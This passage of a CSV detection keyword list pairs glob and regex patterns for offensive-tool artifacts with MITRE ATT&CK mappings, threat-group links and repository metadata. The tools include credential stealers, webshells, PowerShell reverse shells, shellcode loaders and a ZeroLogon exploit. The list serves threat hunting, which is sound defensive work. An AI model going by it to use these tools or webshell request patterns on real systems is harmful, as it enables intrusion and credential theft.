"*/SharpToken/releases/download/*",".{0,1000}\/SharpToken\/releases\/download\/.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","11141" "*/SharpTokenFinder.exe*",".{0,1000}\/SharpTokenFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11142" "*/SharpUnhooker.git*",".{0,1000}\/SharpUnhooker\.git.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","N/A","9","5","400","80","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z","11143" "*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11144" "*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11145" "*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11146" "*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11147" "*/SharpUp.git*",".{0,1000}\/SharpUp\.git.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","11148" "*/SharpVeeamDecryptor.*",".{0,1000}\/SharpVeeamDecryptor\..{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","1","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","11149" "*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11150" "*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11151" "*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT29","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11152" "*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","SharpView","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11153" "*/SharpView.git*",".{0,1000}\/SharpView\.git.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","11154" "*/SharpWeb.dll*",".{0,1000}\/SharpWeb\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","11155" "*/SharpWeb.exe*",".{0,1000}\/SharpWeb\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11156" "*/SharpWeb.exe*",".{0,1000}\/SharpWeb\.exe.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","1","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","11157" "*/SharpWeb.git*",".{0,1000}\/SharpWeb\.git.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","1","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","11158" "*/SharpWebScan.exe*",".{0,1000}\/SharpWebScan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 
- T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11159" "*/SharpWebServer.exe*",".{0,1000}\/SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11160" "*/SharpWebServer.exe*",".{0,1000}\/SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11161" "*/SharpWifiGrabber.exe*",".{0,1000}\/SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11162" "*/SharpWifiGrabber.exe*",".{0,1000}\/SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11163" "*/SharpWifiGrabber.exe*",".{0,1000}\/SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds 
of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11164" "*/sharpwmi.exe*",".{0,1000}\/sharpwmi\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11165" "*/SharpWMI.exe*",".{0,1000}\/SharpWMI\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11166" "*/SharpWMI.exe*",".{0,1000}\/SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# 
offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11167" "*/SharpWSManWinRM.vbs*",".{0,1000}\/SharpWSManWinRM\.vbs.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","11168" "*/SharpWSUS*",".{0,1000}\/SharpWSUS.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","11169" "*/SharpXDecrypt.exe*",".{0,1000}\/SharpXDecrypt\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11170" "*/SharPyShell*",".{0,1000}\/SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","11171" "*/SharpZeroLogon.exe*",".{0,1000}\/SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11172" "*/SharpZeroLogon.exe*",".{0,1000}\/SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11173" "*/SharpZeroLogon.exe*",".{0,1000}\/SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds 
of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11174" "*/SharpZeroLogon.git*",".{0,1000}\/SharpZeroLogon\.git.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","1","N/A","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","11175" "*/Shell/reflect.jsp?u=http://*",".{0,1000}\/Shell\/reflect\.jsp\?u\=http\:\/\/.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11176" "*/shell/shell_port.*",".{0,1000}\/shell\/shell_port\..{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","11177" 
"*/shell?cmd=whoami*",".{0,1000}\/shell\?cmd\=whoami.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11178" "*/shell?k=*&ip=*&cmd=*",".{0,1000}\/shell\?k\=.{0,1000}\&ip\=.{0,1000}\&cmd\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","11179" "*/shell_exec.py*",".{0,1000}\/shell_exec\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","11180" "*/Shell3er.git*",".{0,1000}\/Shell3er\.git.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","11181" "*/Shell3er.ps1*",".{0,1000}\/Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","11182" "*/Shell3er/*",".{0,1000}\/Shell3er\/.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","N/A","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","11183" "*/shellcode*loader.bin*",".{0,1000}\/shellcode.{0,1000}loader\.bin.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","11184" "*/shellcode.bin*",".{0,1000}\/shellcode\.bin.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","11185" "*/shellcode.bin.*",".{0,1000}\/shellcode\.bin\..{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
